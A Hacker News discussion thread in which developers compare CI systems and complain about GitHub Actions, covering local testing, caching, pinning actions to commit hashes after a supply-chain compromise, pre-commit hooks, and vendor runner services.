This is exactly a big piece of our frustration -- the terrible feedback loop and how much mental space it wastes. OP does talk about this at the end (babysitting the endless "wip" commits till something works).
figmert 7 days ago [-]
Highly recommend nektos/act, and if it's something complex enough, you can SSH into the runner to investigate. There are many actions that facilitate this.
tomjakubowski 5 days ago [-]
I use LLMs for a lot of things these days, but maybe the most important one is as a focus-preserving mechanism for exactly these kinds of middle-ground async tasks that have a feedback loop measured in a handful of minutes.
If the process is longer than a few minutes, I can switch tasks while I wait for it. It's waiting for those things in the 3-10 minute range that is intolerable for me: long enough I will lose focus, not long enough for me to context switch.
Now I can bullshit with the LLM about something related to the task while I wait, which helps me to stay focused on it.
silisili 7 days ago [-]
I worked at companies using Gitlab for a decade, and got familiar with runners.
Recently switched to a company using Github, and assumed I'd be blown away by their offering because of their size.
Well, I was, but not in the way I'd hoped. They're absolutely awful in comparison, and I'm beyond confused how it got to that state.
If I were running a company and had to choose between the two, I'd pick Gitlab every time just because of Github actions.
yoyohello13 7 days ago [-]
Glad I’m not the only one. GitLab runners just make sense to me. A container you run scripts in.
I have some GitHub actions for some side projects and it just seems so much more confusing to setup for some reason.
briansmith 7 days ago [-]
Actions have special integration with GitHub (e.g. they can annotate the pull request review UI) using an API. If you forgo that integration, then you can absolutely use GitHub Actions like "a container you run scripts in." This is the advice that is usually given in every thread about GitHub Actions.
byroot 7 days ago [-]
That helps a bit but doesn't solve everything.
If you want to make CI performant, you'll need to use some of its features like caches, parallel workers, etc. And GHA usability really falls short there.
The only reason I put up with it is that it's free for open source projects and integrated in GitHub, so it took over Travis-ci a few years ago.
mubou 7 days ago [-]
Devil's advocate: They could make the github CLI capable of doing all of those things (if it's not already), and then the only thing the container needs is a token.
pinkgolem 7 days ago [-]
There are multiple ways you can do this already from within a script
baq 7 days ago [-]
Ah, the Dropbox comment.
> For a Linux user, you can already build such a system yourself quite trivially by getting an FTP account, mounting it locally with curlftpfs, and then using SVN or CVS on the mounted filesystem. From Windows or Mac, this FTP account could be accessed through built-in software.
I just told the OP that there are multiple ways to achieve that from within a script without using API keys, one of them being echoing text to a file. To me, your comparison makes no sense.
HdS84 7 days ago [-]
There are lots of problems.
Actions try to abstract the script away, give you a consistent experience and, most crucially, allow sharing. Because GitLab has no real way to share actions or workflows (I can do YAML includes, but come on, that sucks even harder than Actions), you are constantly reinventing the wheel.
That's OK if all you do is "build folder", but if you need caching, reporting of issues, code coverage, etc., it gets real ugly really fast.
Example: yesterday I tried services, i.e. starting up some DB and backend containers to run integration tests against. Unfortunately, you cannot expand dynamic variables (set by previous containers) but are limited to already-set vars. So back to docker compose... and the GitLab pipelines are chock full of such weird limitations.
kroolik 7 days ago [-]
You can pass dynamic env to other jobs by exporting an env file as a dotenv artifact. The first job creates a dotenv file and exports it as an artifact; the second depends on the first, so it can consume the artifact. https://docs.gitlab.com/ci/yaml/artifacts_reports/#artifacts...
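A minimal sketch of that pattern (job and variable names are made up):

```yaml
# Pass dynamic variables between GitLab CI jobs via a dotenv artifact.
build:
  stage: build
  script:
    - echo "APP_VERSION=$(git describe --tags)" >> build.env
  artifacts:
    reports:
      dotenv: build.env

test:
  stage: test
  needs: ["build"]
  script:
    - echo "testing version $APP_VERSION"   # injected automatically
```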
HdS84 7 days ago [-]
Yes, that works for most things, e.g. for services:name, but not for services:variables:xxx.
raffraffraff 7 days ago [-]
I haven't looked too much into how sharing workflows works, but isn't the use of shared GitHub workflows (from outside your org) a little dangerous? I get it, we use other people's code all the time. Some we trust more (ISO of a Linux OS with SHA) and others we trust a little less even if it comes from a verified source with GPG, because we know that supply chain attacks can happen.
Every time someone introduced a new way to use someone else's shared magic I feel nervous about using it. Like GitHub Actions. Perhaps it's time for me to dig into them a bit more and try to understand if/how they're safe to use. But I seem to remember just a few days ago someone mentioning a GitHub action getting hijacked?
I will be stunned if this doesn't become a more popular attack vector over the next few years. Lots of valuable stuff sits in github, and they're a nearly-wide-open hole to access it.
vel0city 7 days ago [-]
Definitely a mixed bag. Lots of community derived actions which yes, potentially have some bad supply chain questions. I tend to try and avoid these as much as possible. Lots of established vendors also have their own actions shared though, so you don't have to reinvent the wheel when interacting with their platforms/services/products.
For instance, AWS has a lot of actions they maintain to assist with common CI/CD needs with AWS services.
So GitHub was really the perfect acquisition for the Microsoft portfolio: applications with a big market share that are technically inferior to the competition.
// Luckily still a GitLab user, but recently forced onto Microsoft Teams and Office.
out-of-ideas 7 days ago [-]
> recently forced to Microsoft Teams
my condolences to you and your team for that switch; it's my 2nd used-and-disliked thing (right next to atlassian) - oh well
but one cool feature I found in MS Teams that Zoom did not have (some years ago, no clue now) is turning off incoming video, so you don't have to be constantly distracted in meetings
edit:
oh yeah, re github actions and the user that said:
> Glad I’m not the only one
me too, me too; gh actions seem frustrating (from a user hardly using gh actions, and more gitlab things - even though gitlab seems pretty wonky at times, too)
jcattle 7 days ago [-]
I prefer teams just for the fact that by default everyone can mute everyone else in the call. It just gives me peace of mind that if I ever leave my mic on by mistake, someone in the call would have my back and just mute me.
folmar 7 days ago [-]
Pretty much any major teleconferencing software has done that for a few years already.
rhubarbtree 7 days ago [-]
Technical superiority is so irrelevant compared to distribution. Welcome to capitalism, where the market rewards marketing.
OJFord 6 days ago [-]
> I have some GitHub actions for some side projects and it just seems so much more confusing to setup for some reason.
Because the docs are crap, perhaps? I prefer it, having used both professionally (and Jenkins, Circle, Travis), but I do think the docs are really bad. Even just the nesting of pages once you have them open: where is the bit with the actual bloody syntax reference, the functions, the contexts, etc.?
globular-toast 7 days ago [-]
Same. I'd been using Gitlab for a few years when Actions came out. Looked at it and thought, wow that's weird, but gave it the benefit of the doubt as it's just different, surely it would make sense eventually. Well no, it doesn't make sense, and seeing all the shocked Pikachu at the action compromise the other day was amusing.
zamalek 7 days ago [-]
> I'm beyond confused how it got to that state.
A few years back I wanted to throw in the towel and write a more minimal GHA-compatible agent. I couldn't even find where in the code they were calling out to GitHub APIs (one goal was to have that first party progress UI experience). I don't know where I heard this, so big hearsay warning, but apparently nobody at GitHub can figure it out either.
jalaziz 7 days ago [-]
GitHub Actions started off great while they were iterating quickly, but it very much seems that GitHub has taken its eye off the ball and the improvements have all but halted.
Sad to see Earthly halting development and Dagger jumping on the AI train :(. Hopefully we'll get a proper alternative.
On a related note, if you're considering https://www.blacksmith.sh/, you really should consider https://depot.dev/. We evaluated both but went with Depot because the team is insanely smart and they've solved some pretty neat challenges. One of the cooler features is that their caching works with the default actions/cache action. There's absolutely no need to switch out popular third party actions in favor of patched ones.
shykes 7 days ago [-]
> Sad to see Earthly halting development and Dagger jumping on the AI train :(. Hopefully we'll get a proper alternative.
Hi, Dagger CEO here. We're advertising a new use case for Dagger (running AI agents) while continuing to support the original use case (running complex builds and tests). Dagger has always been a general purpose engine, and our community has always used it for more than just CI. It's still the exact same engine, CLI, SDKs and observability stack. It's not like we're discontinuing a product, to the contrary: we're getting more workloads on the platform, which benefits all our users.
jalaziz 7 days ago [-]
Great to know. I think the fear is that so many companies are prioritizing AI workloads for the valuation bump rather than delivering actual meaningful value.
shykes 7 days ago [-]
I completely understand that fear. I see lots of other tech companies making that mistake, throwing away a perfectly good product and market out of pure "FOMO". I really, really don't want us to be one of those companies.
I think what we're doing is different: we built a product that was always meant to be general purpose; encouraged our community to experiment with alternative use cases; and are now doubling down on a new use case, for the same product. We are still worried about the perception of a FOMO-driven AI pivot (and the reactions on this thread confirm that we still have work to do there); but we're confident that the product really is capable of supporting both.
Thank you for the thoughtful comments, I appreciate it.
SamuelAdams 7 days ago [-]
A lot of GH actions teams were impacted by layoffs in November.
Presumably the issue is that GitHub underpriced Actions such that it's not worth improving (driving more usage won't drive revenue), and that in turn forced prices down for everyone else because the market anchored on the Actions pricing.
pinkgolem 7 days ago [-]
I might have missed the news, but I did not find anything in regards to earthly stopping development
Sigh, this is awful. Earthly is/was not perfect, but is basically the most capable build tool I've ever used. Fingers crossed there's enough enthusiasm in the community to fork it (I'd be organizing it myself if I had any experience with Go at all)
pimeys 7 days ago [-]
We switched to Depot last week. Our Rust builds went down from 20+ minutes to 4-8 minutes. The easy setup and their docker builds with fast caching are really good.
lsuresh 7 days ago [-]
This sounds promising. What made your Rust builds become that fast? Any repo you could point us to?
What makes Depot so fast is that they use NVMe drives for local caching and they guarantee that the cache will always be available for the same builders. So you don't suffer from the cold-start problem or having to load your cache from slow object storage.
lsuresh 7 days ago [-]
Thanks! We already use self-hosted runners on physical machines with NVMe drives that we assembled ourselves. I was wondering if there's something else you're doing for the caching.
kylegalbraith 6 days ago [-]
Founder of Depot here. For image builds, we’ve done quite a bit of optimization to BuildKit for our image builders to make certain aspects of the builds fast like load, cache invalidations, etc.
We also do native multi-platform builds behind one build command. So you can call `depot build --platform linux/amd64,linux/arm64` and we will build on native Intel and ARM CPUs and skip all the emulation. All of that adds up to really fast image builds.
Hopefully that’s helpful!
suryao 7 days ago [-]
If you're building rust containers, we have the world's fastest remote container builders with automated caching.
You wouldn't really have to change anything in your Dockerfile to leverage this and see a significant speedup.
> Trivial mistakes (formatting, unused deps, lint issues) should be fixed automatically, not cause failures.
Do people really consider this best practice? I disagree. I absolutely don't want CI touching my code. I don't want to have to remember to rebase on top of whatever CI may or may not have done to my code. Not all linters are auto-fixable so anyway some of the time I would need to fix it from my laptop. If it's a trivial check it should run as a pre-commit hook anyway. What's next, CI should run an LLM to auto-fix failing test cases?
Do people actually prefer CI auto-fixing anything?
thedougd 7 days ago [-]
I think this is where things went off the rails for him. Committing back to the same branch that is running CI has too many gotchas in any CI system. You touched on the first issue: the remote branch immediately deviates unexpectedly from the local branch. Care also has to be taken not to trigger additional CI runs from that commit.
stared 7 days ago [-]
I do such things with pre-commit.
Doing it in CI sounds like making things more complicated: you end up resetting to remote branches after pushing commits. And, in the worst case, it's something that actually breaks code that works locally.
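For reference, a minimal pre-commit setup of the kind being described might look like this (the specific hook repos and versions are illustrative, not anything the commenter specified):

```yaml
# .pre-commit-config.yaml
repos:
  - repo: https://github.com/pre-commit/pre-commit-hooks
    rev: v4.6.0
    hooks:
      - id: trailing-whitespace
      - id: end-of-file-fixer
  - repo: https://github.com/astral-sh/ruff-pre-commit
    rev: v0.6.9
    hooks:
      - id: ruff
        args: [--fix]  # auto-fix lint issues locally, before the commit exists
```

After `pre-commit install`, the hooks run on every `git commit`, so the fixes land in the developer's working tree instead of in a CI-generated commit.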
Marsymars 7 days ago [-]
I have team members who complain that installing and running pre-commit is too much overhead, so instead I see them pushing commit after broken commit that tie up CI resources to fail on the pre-commit workflow. :(
michpoch 7 days ago [-]
> I have team members who complain that installing and running pre-commit is too much overhead
Why do they have a say in this? This is up to tech leadership to set standards that need to be followed.
anbotero 6 days ago [-]
I’ve had people like this. I’m with the other commenter that: Why do they have a say in this? No way I’m letting them decide each day when to format, what style to format to... Meet, discuss, pick a style, enforce formatting, screw you if you don’t follow.
I’m also with the other commenter about setting these things at the editor level, but also at the pre-push level.
We benchmark how long it takes to format/lint only changed files: usually no more than a second, maybe two, though I admit for some languages it may take more. An editor with a properly set up language server would also help you find issues earlier.
We also have reports for our CI pipeline linters, so if we see more than one report there, we send a message to the team: it means someone didn’t set up their editor or their git hooks.
If the checks take more than a second, yeah, pre-commit is probably not the right place/moment. Reliability is important, but so is user experience. I’ve worked at companies that ran the unit test suite at the pre-commit level, alright? And that is NOT fine. While it sounds like it’ll find issues earlier, it’ll wreck your developers’ time if they have to wait seconds/minutes each time they fix a comma.
Marsymars 5 days ago [-]
> Why do they have a say in this?
Because at the institutional level, there isn’t the appropriate will to mandate that devs fix their local environments, and I don’t feel like burning my own political capital on that particular fight.
Agreed on the performance comments.
tenacious_tuna 6 days ago [-]
I'm one of these; I'm loath to put anything between me and making a commit, and most of our linters take several dozen seconds to run. That's unacceptable UX to me; I can disable the hooks with `--no-verify`, but it's always annoying to remember that when the thing I most want to do is save my working state.
I'd rather have linting pushed into the editing process, within my IDE/VS Code/vim plugins, whathaveyou, where it can feedback-loop with my actual writing process and not just be some ancillary command I run with lots of output I never read.
Marsymars 5 days ago [-]
Oh, yeah, ours aren’t nearly that bad. Our pre-commit checks are <1s and our pre-push are <10s. (And the worst-performing pre-commit hook is Git LFS that runs through pre-commit... maybe there’s some way to improve the performance there.)
We have a lot of IDE checks, but they’re just warnings when debugging (because devs complained, IMO reasonably, that having them as errors during dev was too inconvenient during development/debugging). CI fails with any warnings, and we have devs who don’t bother to check their IDE warnings before committing and pushing to a PR.
llm_nerd 6 days ago [-]
That part immediately made me short circuit out of the piece. That sounds like a recipe for disaster and an unnecessary complexity that just brings loads of new failure modes. Not a best practice.
Trivial mistakes in PRs are almost always signs of larger errors.
ben_pfaff 7 days ago [-]
I'm new to CI auto-fixes. My early experience with it is mixed. I find it annoying that it touches my code at all, but it does sometimes allow a PR to get further through the CI system to produce more useful feedback later on. And then a lot of the time I end up force-pushing a branch that is revised in other ways, in which case I fold in whatever the CI auto-fix did, either by squashing it in or by applying it in some other way.
(Most of the time, the auto-fix is just running "cargo fmt".)
kylegalbraith 7 days ago [-]
This was an interesting read and highlighted some of the author's top-of-mind pain points and rough edges. However, in my experience, this is definitely not an exhaustive list, and there are actually many, many, many more.
Things like 10 GB cache limits in GitHub, concurrency limits based on runner type, the expensive price tag for larger GitHub runners, and that's before you even get to the security ones.
Having been building Depot[0] for the past 2.5 years, I can say there are so many footguns in GitHub Actions that you don't notice until you start seeing how folks bend YAML workflows to their will.
We've been quite surprised by the `container` job. Namely, folks want to try to use it to create a reproducible CI sandbox for their build to happen in. But it's surprisingly difficult to work with. Permissions are wonky, Docker layer caching is slow and limited, and paths don't quite work as you thought they did.
With Depot, we've been focusing on making GitHub Actions exponentially faster and removing as many of these rough edges as possible.
We started by making Docker image builds exponentially faster, and we've since brought that architecture and performance to our own GHA runners [1]. We've built up and optimized the compute and processes around the runner to make jobs extremely fast, like making caching 2-10x faster without having to replace or use any special cache actions of ours. Our Docker image builders sit right next door on dedicated compute with fast caching, which makes the `container` job a lot better: we can build the image quickly, and then you can use that image right from our registry in your build job.
All in all, GHA is wildly popular. But the sentiment, even among its biggest fans, is that it could be a lot better.
By what measure is this "exponentially faster"? Surely GH doesn't take an exponential time in the number of steps of the workflow...
magicalhippo 7 days ago [-]
Depot looks nice, but also fairly expensive to me. We're a small B2B company, just 10 devs, but we'd be looking at $200 + $500 = $700/mo just for building and CI.
I guess that would be reasonable if we really needed the speedup, but if you're also offering a better QoL GHA experience then perhaps another tier for people like us who don't necessarily need the blazing speed?
suryao 7 days ago [-]
You might want to check out my product, WarpBuild[0].
We are fully usage based, no minimums etc., and our container builders are faster than others on the market.
We also have a BYOC option that gives a 10x cost reduction and is used by many customers at scale.
We're rolling out new pricing in the next week or two that should likely cover your use case. Feel free to ping me directly, email in my bio, if you'd like to learn more.
axelfontaine 7 days ago [-]
At https://sprinters.sh we offer AWS-hosted runners at a price point that will be much more suitable for a company like yours.
Aeolun 7 days ago [-]
Depot is fantastic. Can heavily recommend it. It’s like magic when your builds suddenly take 1m instead of 5+ just by switching the runner.
tasuki 7 days ago [-]
> Things like 10 GB cache limits in GitHub
10,000,000,000 bytes should be enough for anyone! It really is a lot of bytes...
hn_throwaway_99 7 days ago [-]
> A few days ago, someone compromised a popular GitHub Action. The response? "Just pin your dependencies to a hash." Except as comments also pointed out, almost no one does.
I used GitHub actions when building a fin services app, so I absolutely used the hash to specify Action dependencies.
I agree that this should be the default, or even the required, way to pull in Action dependencies, but saying "almost no one does" is a pretty lame excuse when talking about your own risk. What other people do has no bearing on your options here.
Pin to hashes when pulling in Actions - it's much, much safer
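Concretely, pinning an action means referencing an immutable commit hash instead of a mutable tag (the hash below is illustrative):

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      # Mutable: the "v4" tag can be re-pointed at any time by the action's owner
      # - uses: actions/checkout@v4

      # Immutable: resolves to exactly one commit; the trailing comment records
      # which release the hash corresponded to when it was pinned
      - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
```

A compromised maintainer account can move tags and branches, but cannot change what an existing commit hash points to.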
dijit 7 days ago [-]
I think the HN community at large had a bit of a learning experience a couple of days ago.
"Defaults matter" is a common phrase, but equally true is: "the patterns everyone recommends, including in example documentation, matter".
It is fair to criticise the usage of GH Actions, just as it's fair to criticise common usage patterns of MySQL that eat your data: even if smarter individuals (who learn from deep understanding, or from being burned) can make correct decisions, the population of users at large is affected and has to learn the hard way or be educated.
hn_throwaway_99 7 days ago [-]
I wholeheartedly agree, and perhaps it was just how I was interpreting the author's statement in the article. If it's saying that the "default" way of using GitHub Actions is dangerous and leads to subtle security footguns, I completely agree. But if you know the proper way to use and secure Actions, saying "everyone else does it a bad way" is irrelevant to your security posture.
7 days ago [-]
gazereth 7 days ago [-]
Pinning dependencies is trading one problem for another.
Yes, your builds will work as expected for a stretch of time, but that period will come to an end, eventually.
Then one day you will be forced to update those pinned dependencies and you might find yourself having to upgrade through several major versions, with breaking changes and knock-on effects to the rest of your pipelines.
Allowing rolling updates to dependencies helps keep these maintenance tasks small and manageable across the lifetime of the software.
StrLght 7 days ago [-]
You don’t have to update them manually. Renovate supports pinned GitHub Actions dependencies [1]. Unfortunately, I don’t use Dependabot so can’t say whether it does the same.
Just make sure you don’t leak secrets to your PRs. Also I usually review changes in updated actions before merging them. It doesn’t take that much time, so far I’ve been perfectly fine with doing that.
Dependabot does support pinned hashes, and even adds a comment after them with the tag. Dependabot fatigue is a thing though, and blindly mashing "merge" doesn't do much for your security; but at least there's some delay between a compromise and your workflow being updated to include it.
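For reference, enabling this is a small config file; Dependabot will then open PRs that keep hash-pinned `uses:` lines up to date (annotated with the corresponding tag):

```yaml
# .github/dependabot.yml
version: 2
updates:
  - package-ecosystem: "github-actions"
    directory: "/"  # scans .github/workflows in the repo root
    schedule:
      interval: "weekly"
```

The review burden discussed above still applies: the config only automates proposing the updates, not vetting them.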
baq 7 days ago [-]
Not pinning dependencies is an existential risk to the business. Yes it’s a tradeoff, you must assign a probability of any dependency being hijacked in your timeframe yourself, but it is not zero.
tasuki 7 days ago [-]
I don't think others were necessarily talking about "business".
Though, yes, I prefer pinning dependencies for my personal projects. I don't see why things should break when I explicitly keep them the same.
kevincox 7 days ago [-]
That isn't even the biggest problem. That breaks, and breakage gets fixed. Other than some slight internal delays there is little harm done. (You have a backup emergency deploy process that doesn't depend on GitHub anyways right?)
The real problem is security vulnerabilities in these pinned dependencies. You end up making a choice between:
1. Pin and risk a malicious update.
2. Don't pin and have your dependencies get out of date and grow known security vulnerabilities.
progbits 7 days ago [-]
But there is no transitive locking like package-manager lockfiles. So if I depend on good/foo@hash, and it depends on bad/hacked@v1, and v1 gets moved to a malicious version, I get screwed.
This is for composite actions. For JS actions, what if they don't lock their dependencies but pull whatever the newest package is at action setup time? Same issue.
I'd have to transitively fork everything and pin it myself, and then keep it updated.
To make sure that you can test CI locally, the best way I've found so far is to make sure the checks can run with Nix, and then keep the CI config itself as simple as possible and just call Nix.
As for reducing boilerplate in the CI configs, GitHub Actions is a programming language with support for functions! It's just that function calls can only appear in very limited places in the program (only inside `steps`), and to define a function, you have to create a Git repository. The function call syntax is also a bit unusual: it's written with the `uses` keyword. So there is a lot of boilerplate that you can't remove this way, though there are several other YAML eDSLs hidden in GitHub Actions that address some of it. E.g. you can create loops with `matrix`, but again, not general-purpose loops; they can only appear in a very specific syntactic location.
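As a sketch of that point: `uses` is the "function call" (legal only inside `steps`), `with` is its argument list, and `matrix` is the restricted "loop" (legal only inside `strategy`):

```yaml
jobs:
  test:
    strategy:
      matrix:
        python: ["3.11", "3.12"]  # the only loop construct, legal only here
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4       # a "function call", legal only in steps
      - uses: actions/setup-python@v5
        with:                            # the "function arguments"
          python-version: ${{ matrix.python }}
      - run: pytest
```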
To really deduplicate stuff, rather than copy-pasting blocks of YAML or using a mix of these special YAML eDSLs, in the past I've used Nix and Python to generate JSON. Now I'm using RCL for this (https://rcl-lang.org). All of them are general-purpose YAML deduplicators, where you can put loops or function calls anywhere you want.
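A toy version of the generate-JSON approach in Python (illustrative, not the commenter's actual setup): build the job map with a real loop, then serialize to JSON, which works because YAML is a superset of JSON.

```python
import json

# A real loop instead of the `matrix:` eDSL: one job per platform.
platforms = ["ubuntu-latest", "macos-latest", "windows-latest"]

workflow = {
    "on": "push",
    "jobs": {
        f"test-{runner.split('-')[0]}": {
            "runs-on": runner,
            "steps": [
                {"uses": "actions/checkout@v4"},
                {"run": "make test"},
            ],
        }
        for runner in platforms
    },
}

# The JSON output is itself a valid workflow file, since YAML parsers accept JSON.
print(json.dumps(workflow, indent=2))
```

Here the loop and the naming logic live in ordinary code, where they can be factored into functions and unit-tested.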
duijf 6 days ago [-]
> It's just that function calls can only appear in very limited places in the program (only inside `steps`), and to define a function, you have to create a Git repository.
FYI there is also `on: workflow_call` which you can use to define reusable jobs. You don't have to create a new repository for these
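A minimal sketch of that (file names and inputs are illustrative): the reusable workflow is the "function definition", and the caller invokes it at the job level rather than the step level.

```yaml
# .github/workflows/reusable-test.yml -- the "function definition"
on:
  workflow_call:
    inputs:
      node-version:
        type: string
        required: true
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
        with:
          node-version: ${{ inputs.node-version }}
      - run: npm test

---
# .github/workflows/ci.yml -- the caller; note `uses` at the *job* level
on: push
jobs:
  test:
    uses: ./.github/workflows/reusable-test.yml
    with:
      node-version: "20"
```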
Usually if you’re using it, it’s because you’re forced to.
In my experience, the best strategy is to minimize your use of it — call out to binaries or shell scripts and minimize your dependence on any of the GHA world. Makes it easier to test locally too.
sepositus 7 days ago [-]
This is what I do. I've written 90% of the logic into a Go binary and GitHub Actions just calls out to it at certain steps. It basically just leaves GHA doing the only thing it's decent at...providing a local UI for pipelines. The best part is you get unit tests, can dogfood the tool in its own pipeline, and can run stuff locally (by just having the CLI nearby).
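The resulting workflow ends up as a thin shim along these lines (the `./ci` package name and its subcommands are hypothetical):

```yaml
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-go@v5
        with:
          go-version: "1.22"
      # All real logic lives in the repo's own Go tool; the same commands
      # run unchanged on a laptop.
      - run: go run ./ci build
      - run: go run ./ci test
```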
noisy_boy 7 days ago [-]
Makes migrations easier too; better to let GitHub or GitLab etc. just be the platform that hosts source code and triggers events, which you decide how to handle. Your CI itself should be another source-controlled repo that provides the features for the application code's thin CI layer to invoke and use. That also allows you to run your CI locally in a pretty realistic manner.
I have done something similar with Jenkins and a Groovy CI library used by Jenkins pipelines. But it wasn't super simple, since a lot of it assumed Jenkins. I wonder if there is a cleaner open-source option that doesn't assume any underlying platform.
raffraffraff 7 days ago [-]
> Usually if you’re using it, it’s because you’re forced to.
Like teams.
0xbadcafebee 7 days ago [-]
I have used Travis, CircleCI, GitHub Actions, GitLab Pipelines, AWS CodeBuild/CodeDeploy, Bazel, Drone, GoCD, and Jenkins. And I have used GitLab, GitHub, and Bitbucket for hosting VCS files. (I'm the guy who manages this crap for a living, so I have used it all extensively, from startups to enterprises)
GitHub Actions is the worst possible CI platform - except for all the others. Every single CI platform has weird limitations, missing features, gotchas, footguns, pain points. Every single one requires workarounds, leaves you tearing your hair out, banging the table trying to figure out how to do something that should be simple.
Of all of them I've tried, Drone is the platonic ideal of the best, simplest, most generally useful system. It is limited, but those limits are usually easy to work around and don't impose artificial constraints. However, you won't find nearly as many canned solutions or plugins as in the GitHub Marketplace, and the enterprise features are few.
GHA is great because of things like Dependabot, and the million canned Marketplace actions, and it's all tightly integrated with GH's features, so you don't have to work hard to get anything advanced or specific to work. Tight integration can save you weeks to months of development time on a CI solution. I've literally seen teams throw out versioning of dependencies entirely because they weren't updating their dependencies, because there's no Dependabot orb for CircleCI. If they had just been on GHA using Dependabot it would have saved them literal years of headaches.
Jenkins is, ironically, both the most full-featured, and the absolute worst to configure/maintain. Worst design, worst security, worst everything... except it does have a plugin for everything, and a UI for everything. I hate it with the fire of a million suns. But people won't stop using it, partially because it's so goddamn configurable, and they learned it years ago and won't stop using it. If anyone wants to write a replacement, I'm happy to help (I even wrote a design doc!).
tech_tuna 6 days ago [-]
It's funny, I've used them all too. . . I like GHA overall but it sure has its quirks.
Anyone who claims that GHA is garbage and any of the others are amazing is either doing something very basic or is crazy, or lying.
At the end of the day, you run shell scripts and commands using a YAML based config language (except for Jenkins). Amazingly, it's hard to build something that does that with the right abstractions and compromises between flexibility and good hygiene.
Tainnor 6 days ago [-]
> GHA is great because of things like Dependabot [...] so you don't have to work hard to get anything advanced or specific to work.
That may have been true before GitHub decided that PRs can't access repository secrets anymore. Apparently now you can at least add these secrets to Dependabot too (which is still duplicate effort for setup and any time you rotate secrets), but at the time when the change was introduced there were only weird workarounds.
ThomasRooney 7 days ago [-]
> A few days ago, someone compromised a popular GitHub Action. The response? "Just pin your dependencies to a hash." Except as comments also pointed out, almost no one does.
I'm surprised nobody has mentioned dependabot yet. It automates this, keeping action dependencies pinned by hash automatically whilst also bringing in stable upgrades.
huijzer 7 days ago [-]
Well but that’s the problem. You cannot fully automate this. You have to manually check the diff of each dependency and only accept the dependabot PR if the changes are safe.
The only automation that I know of is cargo vet. Although it doesn’t work for GitHub Actions, the idea sounds useful. Basically, vet allows people who trust each other to vet updates. So one person verifies the diff and then approves the changes. Next, everyone who trusts this person can update the dependency automatically since it has been “vetted”.
Dependabot is only approximately as good as your tests. If you have holes in your testing that you can drive a bus through, you're gonna have a bad time.
We also, to your point, need more labels than @latest. Most of the time I want to wait a few days before taking latest, and if there have been more updates since that version, I probably don't want to touch anything for a little bit.
Common reason for 2 releases in 2 days: version 1 has a terrible bug in it that version 2 tries to fix. But we won't be certain about that one either until it's been a few more days with no patch for the patch for the patch.
7 days ago [-]
esafak 7 days ago [-]
dependabot now has beta support for delayed upgrades.
sureIy 6 days ago [-]
Thank god. Getting dependabot PRs for a major version released yesterday is just a waste of time.
presentation 7 days ago [-]
Wasn’t part of the problem though that renovate was automatically upgrading people to the compromised hash? Or is that just the fault of people configuring it to be too aggressive with upgrades?
Arbortheus 5 days ago [-]
No, someone just impersonated renovate bot and the repo author got tricked
7 days ago [-]
knazarov 7 days ago [-]
We use a combination of AWS autoscaling and Nix to make our CI pipeline bearable.
For autoscaling we use terraform-aws-github-runner which will bring up ephemeral AWS machines if there are CI jobs queued on GitHub. Machines are then destroyed after 15 minutes of inactivity so they are always fresh and clean.
For defining build pipelines we use Nix. It is used both for building various components (C++, Go, JS, etc) as well as for running tests. This helps to make sure that any developer on the team can do exactly the same thing that the CI is doing. It also utilizes caching on an S3 bucket so components that don't change between PRs don't get rebuilt and re-tested.
It was a bit of a pain to set up (and occasionally a pain to maintain), but overall it's worth it.
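The shape of that setup, roughly (the installer action and flake attribute names are illustrative): the workflow only installs Nix and delegates, so the same commands behave identically on a developer machine.

```yaml
jobs:
  ci:
    runs-on: ubuntu-latest  # or the ephemeral self-hosted runner label
    steps:
      - uses: actions/checkout@v4
      - uses: DeterminateSystems/nix-installer-action@v14
      # Build and test exactly what developers run locally; the S3 binary
      # cache means unchanged components are fetched, not rebuilt.
      - run: nix flake check
      - run: nix build .#backend .#frontend
```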
maccard 7 days ago [-]
There’s a lot of confident people in this thread saying CI is easy if you “just” make it dumb and keep all the logic in scripts that you farm out to.
My experience is this works for simple scripts but immediately falls apart when you start to do things like "don't run the entire battery of integration tests against a README change", or "run two builds in parallel", or "separate the test step from the build and parallelise it even if the build is serial".
It’s easy to wrap make build and go about your life, but that’s no easier than just using the GitHub action to call go build or mvn build. The complexity comes in "pull that dependency from this place that is in a private repository on GitHub/AWS because it’s 100x faster than doing it from its source", and managing the credentials etc. for all of that stuff. This is also where the "it differs from running locally" comes in too, funnily enough.
larusso 7 days ago [-]
Interesting. I'm also moving our CI to GitHub Actions after years of using Jenkins with custom pipelines written in Groovy etc. I checked out GitHub Actions every now and then to get a feel for whether a move finally makes sense. I started with simple builds, then tested adding our Jenkins macOS agents as self-hosted runners. Just yesterday I wrote two actions to build and test a new .NET project. I was able to run the whole thing with "act" locally before running it on GitHub proper. I also played around and created a custom action in TypeScript (kicked off from the available predefined templates) to see how much work maintaining that means. All in all I'm super happy and see no bigger issues. But here are some things that might be a reason:
I split CI into build-system logic, which should and needs to run locally, and just the stuff that GitHub needs to execute. At best that means describing what runs in parallel and making specific connections. Any complicated logic needs to be abstracted away behind a setup that is itself testable. I handle it the same way for our build-system components. We use Gradle a lot, and a few custom plugins which encapsulate specific builds/automations. It's like dividing your problem into many smaller pieces which are tested and developed in isolation.
Next to Jenkins I also used Travis CI and AppVeyor for projects. And they all had the same commit-and-pray setup that I hate. I wish "act" were a tool directly maintained by the GitHub folks, though.
I don't get the obsession with YAML and making things declarative that really should not be declarative.
I'm so much happier on projects where I can use the non-declarative Jenkins pipelines instead of GH Actions or BB pipelines.
These YAML pipelines are bad enough on their own, but throw in a department that is gatekeeping them and use runners as powerful as my Raspberry Pi and you have a situation where a lot of developers just give up and run things locally instead of the CI.
hinkley 7 days ago [-]
I haven't tried to step through Scons, so that may be a system that looks like how I want it to look but fails entirely to deliver on its promises for all I know.
I think there's a place for making a builder that looks imperative, but can work out a tree of actions and run them. Gulp is a little bit this way, but again I haven't tried to breakpoint through it either.
If the next evolution in DevEx is not caring about what your code looks like in a stepping debugger, then the one after it will be. Making libraries that present a tight demo app for the Readme.md file and then are impossible to do anything tricky with or god forbid debug just needs to fucking stop. Yesterday. And declarative systems are almost always the worst.
neuroelectron 6 days ago [-]
Yes I have to agree Jenkins is the best solution but it's not the hot new thing, AI powered etc. It just works and that's not how you grow your org.
999900000999 7 days ago [-]
Whatever happened to picking the right tool for the job ?
